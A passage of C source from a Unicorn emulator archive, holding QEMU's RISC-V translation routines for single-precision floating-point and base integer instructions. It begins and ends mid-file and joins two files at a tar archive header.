*/ #define REQUIRE_FPU do {\ if (ctx->mstatus_fs == 0) \ return false; \ } while (0) static bool trans_flw(DisasContext *ctx, arg_flw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0, ctx->mem_idx, MO_TEUL); /* RISC-V requires NaN-boxing of narrower width floating point values */ tcg_gen_ori_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rd], 0xffffffff00000000ULL); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } static bool trans_fsw(DisasContext *ctx, arg_fsw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rs2], t0, ctx->mem_idx, MO_TEUL); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmadd_s(DisasContext *ctx, arg_fmadd_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmadd_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fmsub_s(DisasContext *ctx, arg_fmsub_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmsub_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fnmsub_s(DisasContext *ctx, arg_fnmsub_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fnmsub_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fnmadd_s(DisasContext *ctx, arg_fnmadd_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fnmadd_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fadd_s(DisasContext *ctx, arg_fadd_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fadd_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fsub_s(DisasContext *ctx, arg_fsub_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fsub_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fmul_s(DisasContext *ctx, arg_fmul_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmul_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fdiv_s(DisasContext *ctx, arg_fdiv_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fdiv_s(tcg_ctx, 
tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fsqrt_s(DisasContext *ctx, arg_fsqrt_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fsqrt_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); mark_fs_dirty(ctx); return true; } static bool trans_fsgnj_s(DisasContext *ctx, arg_fsgnj_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FMOV */ tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1]); } else { /* FSGNJ */ tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs1], 0, 31); } mark_fs_dirty(ctx); return true; } static bool trans_fsgnjn_s(DisasContext *ctx, arg_fsgnjn_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FNEG */ tcg_gen_xori_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], INT32_MIN); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs2]); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0, tcg_ctx->cpu_fpr[a->rs1], 0, 31); tcg_temp_free_i64(tcg_ctx, t0); } mark_fs_dirty(ctx); return true; } static bool trans_fsgnjx_s(DisasContext *ctx, arg_fsgnjx_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FABS */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], ~INT32_MIN); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs2], INT32_MIN); tcg_gen_xor_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], t0); tcg_temp_free_i64(tcg_ctx, t0); } mark_fs_dirty(ctx); return true; } static bool trans_fmin_s(DisasContext *ctx, arg_fmin_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_fmin_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fmax_s(DisasContext *ctx, arg_fmax_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_fmax_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_w_s(DisasContext *ctx, arg_fcvt_w_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_w_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_wu_s(DisasContext *ctx, arg_fcvt_wu_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_wu_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmv_x_w(DisasContext *ctx, arg_fmv_x_w *a) { /* NOTE: This was FMV.X.S in an earlier version of the ISA spec! 
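 * FMV.X.W copies the raw single-precision bit pattern into the integer
 * register: on RV64 it is sign-extended to XLEN (tcg_gen_ext32s_tl below),
 * on RV32 the low 32 bits of the 64-bit FP register are extracted.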
*/ REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); #if defined(TARGET_RISCV64) tcg_gen_ext32s_tl(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs1]); #else tcg_gen_extrl_i64_i32(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs1]); #endif gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_feq_s(DisasContext *ctx, arg_feq_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_feq_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_flt_s(DisasContext *ctx, arg_flt_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_flt_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fle_s(DisasContext *ctx, arg_fle_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_fle_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fclass_s(DisasContext *ctx, arg_fclass_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_fclass_s(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_s_w(DisasContext *ctx, arg_fcvt_s_w *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_w(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_s_wu(DisasContext *ctx, arg_fcvt_s_wu *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_wu(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmv_w_x(DisasContext *ctx, arg_fmv_w_x *a) { /* NOTE: This was FMV.S.X in an earlier version of the ISA spec! 
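 * FMV.W.X moves the GPR bit pattern into the FP register: a plain move on
 * RV64, a 32-to-64-bit zero extension (tcg_gen_extu_i32_i64) on RV32.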
*/ REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); #if defined(TARGET_RISCV64) tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0); #else tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0); #endif mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } #ifdef TARGET_RISCV64 static bool trans_fcvt_l_s(DisasContext *ctx, arg_fcvt_l_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_l_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_lu_s(DisasContext *ctx, arg_fcvt_lu_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_lu_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_s_l(DisasContext *ctx, arg_fcvt_s_l *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_l(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_s_lu(DisasContext *ctx, arg_fcvt_s_lu *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_lu(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rvi.inc.c������������������������������������������0000664�0000000�0000000�00000037737�14675241067�0023711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V translation routines for the RVXI Base Integer Instruction Set. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. 
*/ static bool trans_illegal(DisasContext *ctx, arg_empty *a) { gen_exception_illegal(ctx); return true; } static bool trans_lui(DisasContext *ctx, arg_lui *a) { if (a->rd != 0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[a->rd], a->imm); } return true; } static bool trans_auipc(DisasContext *ctx, arg_auipc *a) { if (a->rd != 0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[a->rd], a->imm + ctx->base.pc_next); } return true; } static bool trans_jal(DisasContext *ctx, arg_jal *a) { gen_jal(ctx, a->rd, a->imm); return true; } static bool trans_jalr(DisasContext *ctx, arg_jalr *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* no chaining with JALR */ TCGLabel *misaligned = NULL; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, tcg_ctx->cpu_pc, a->rs1); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_pc, a->imm); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_pc, (target_ulong)-2); if (!has_ext(ctx, RVC)) { misaligned = gen_new_label(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->cpu_pc, 0x2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 0x0, misaligned); } if (a->rd != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[a->rd], ctx->pc_succ_insn); } lookup_and_goto_ptr(ctx); if (misaligned) { gen_set_label(tcg_ctx, misaligned); gen_exception_inst_addr_mis(ctx); } ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, t0); return true; } static bool gen_branch(DisasContext *ctx, arg_b *a, TCGCond cond) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l = gen_new_label(tcg_ctx); TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_brcond_tl(tcg_ctx, cond, source1, source2, l); gen_goto_tb(ctx, 1, ctx->pc_succ_insn); gen_set_label(tcg_ctx, l); /* branch taken */ if (!has_ext(ctx, RVC) && ((ctx->base.pc_next + a->imm) & 0x3)) { /* misaligned */ gen_exception_inst_addr_mis(ctx); } else { gen_goto_tb(ctx, 0, ctx->base.pc_next + a->imm); } ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_beq(DisasContext *ctx, arg_beq *a) { return gen_branch(ctx, a, TCG_COND_EQ); } static bool trans_bne(DisasContext *ctx, arg_bne *a) { return gen_branch(ctx, a, TCG_COND_NE); } static bool trans_blt(DisasContext *ctx, arg_blt *a) { return gen_branch(ctx, a, TCG_COND_LT); } static bool trans_bge(DisasContext *ctx, arg_bge *a) { return gen_branch(ctx, a, TCG_COND_GE); } static bool trans_bltu(DisasContext *ctx, arg_bltu *a) { return gen_branch(ctx, a, TCG_COND_LTU); } static bool trans_bgeu(DisasContext *ctx, arg_bgeu *a) { return gen_branch(ctx, a, TCG_COND_GEU); } static bool gen_load(DisasContext *ctx, arg_lb *a, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, memop); gen_set_gpr(tcg_ctx, a->rd, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); return true; } static bool trans_lb(DisasContext *ctx, arg_lb *a) { return gen_load(ctx, a, MO_SB); } static bool trans_lh(DisasContext *ctx, arg_lh *a) { return gen_load(ctx, a, MO_TESW); } static bool trans_lw(DisasContext *ctx, arg_lw *a) { return gen_load(ctx, a, MO_TESL); } static bool trans_lbu(DisasContext *ctx, arg_lbu *a) { return gen_load(ctx, a, MO_UB); } 
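/*
 * For reference, a summary of the MemOp values used by the load/store
 * helpers in this file (gen_load above, gen_store below); the MemOp selects
 * the access width and, for loads, the extension of the loaded value:
 *
 *   MO_SB   - sign-extended  8-bit  (lb / sb)
 *   MO_TESW - sign-extended 16-bit  (lh / sh)
 *   MO_TESL - sign-extended 32-bit  (lw / sw)
 *   MO_UB   - zero-extended  8-bit  (lbu)
 *   MO_TEUW - zero-extended 16-bit  (lhu)
 *   MO_TEUL - zero-extended 32-bit  (lwu, RV64 only)
 *   MO_TEQ  - 64-bit                (ld / sd, RV64 only)
 *
 * The "TE" variants use the target byte order, i.e. little-endian on RISC-V.
 */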
static bool trans_lhu(DisasContext *ctx, arg_lhu *a) { return gen_load(ctx, a, MO_TEUW); } static bool gen_store(DisasContext *ctx, arg_sb *a, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv dat = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); gen_get_gpr(tcg_ctx, dat, a->rs2); tcg_gen_qemu_st_tl(tcg_ctx, dat, t0, ctx->mem_idx, memop); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, dat); return true; } static bool trans_sb(DisasContext *ctx, arg_sb *a) { return gen_store(ctx, a, MO_SB); } static bool trans_sh(DisasContext *ctx, arg_sh *a) { return gen_store(ctx, a, MO_TESW); } static bool trans_sw(DisasContext *ctx, arg_sw *a) { return gen_store(ctx, a, MO_TESL); } #ifdef TARGET_RISCV64 static bool trans_lwu(DisasContext *ctx, arg_lwu *a) { return gen_load(ctx, a, MO_TEUL); } static bool trans_ld(DisasContext *ctx, arg_ld *a) { return gen_load(ctx, a, MO_TEQ); } static bool trans_sd(DisasContext *ctx, arg_sd *a) { return gen_store(ctx, a, MO_TEQ); } #endif static bool trans_addi(DisasContext *ctx, arg_addi *a) { return gen_arith_imm_fn(ctx, a, &tcg_gen_addi_tl); } static void gen_slt(TCGContext *tcg_ctx, TCGv ret, TCGv s1, TCGv s2) { tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, ret, s1, s2); } static void gen_sltu(TCGContext *tcg_ctx, TCGv ret, TCGv s1, TCGv s2) { tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, ret, s1, s2); } static bool trans_slti(DisasContext *ctx, arg_slti *a) { return gen_arith_imm_tl(ctx, a, &gen_slt); } static bool trans_sltiu(DisasContext *ctx, arg_sltiu *a) { return gen_arith_imm_tl(ctx, a, &gen_sltu); } static bool trans_xori(DisasContext *ctx, arg_xori *a) { return gen_arith_imm_fn(ctx, a, &tcg_gen_xori_tl); } static bool trans_ori(DisasContext *ctx, arg_ori *a) { return gen_arith_imm_fn(ctx, a, &tcg_gen_ori_tl); } static bool trans_andi(DisasContext *ctx, arg_andi *a) { return gen_arith_imm_fn(ctx, a, &tcg_gen_andi_tl); } static bool trans_slli(DisasContext *ctx, arg_slli *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->shamt >= TARGET_LONG_BITS) { return false; } if (a->rd != 0) { TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_shli_tl(tcg_ctx, t, t, a->shamt); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); } /* NOP otherwise */ return true; } static bool trans_srli(DisasContext *ctx, arg_srli *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->shamt >= TARGET_LONG_BITS) { return false; } if (a->rd != 0) { TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_shri_tl(tcg_ctx, t, t, a->shamt); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); } /* NOP otherwise */ return true; } static bool trans_srai(DisasContext *ctx, arg_srai *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->shamt >= TARGET_LONG_BITS) { return false; } if (a->rd != 0) { TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_sari_tl(tcg_ctx, t, t, a->shamt); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); } /* NOP otherwise */ return true; } static bool trans_add(DisasContext *ctx, arg_add *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_add_tl); } static bool trans_sub(DisasContext *ctx, arg_sub *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_sub_tl); } static bool trans_sll(DisasContext *ctx, arg_sll *a) { return gen_shift(ctx, a, &tcg_gen_shl_tl); } static bool trans_slt(DisasContext *ctx, arg_slt *a) { TCGContext *tcg_ctx = 
ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_slt); } static bool trans_sltu(DisasContext *ctx, arg_sltu *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_sltu); } static bool trans_xor(DisasContext *ctx, arg_xor *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_xor_tl); } static bool trans_srl(DisasContext *ctx, arg_srl *a) { return gen_shift(ctx, a, &tcg_gen_shr_tl); } static bool trans_sra(DisasContext *ctx, arg_sra *a) { return gen_shift(ctx, a, &tcg_gen_sar_tl); } static bool trans_or(DisasContext *ctx, arg_or *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_or_tl); } static bool trans_and(DisasContext *ctx, arg_and *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_and_tl); } #ifdef TARGET_RISCV64 static bool trans_addiw(DisasContext *ctx, arg_addiw *a) { return gen_arith_imm_tl(ctx, a, &gen_addw); } static bool trans_slliw(DisasContext *ctx, arg_slliw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1; source1 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); tcg_gen_shli_tl(tcg_ctx, source1, source1, a->shamt); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); return true; } static bool trans_srliw(DisasContext *ctx, arg_srliw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_extract_tl(tcg_ctx, t, t, a->shamt, 32 - a->shamt); /* sign-extend for W instructions */ tcg_gen_ext32s_tl(tcg_ctx, t, t); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); return true; } static bool trans_sraiw(DisasContext *ctx, arg_sraiw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_sextract_tl(tcg_ctx, t, t, a->shamt, 32 - a->shamt); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); return true; } static bool trans_addw(DisasContext *ctx, arg_addw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_addw); } static bool trans_subw(DisasContext *ctx, arg_subw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_subw); } static bool trans_sllw(DisasContext *ctx, arg_sllw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_andi_tl(tcg_ctx, 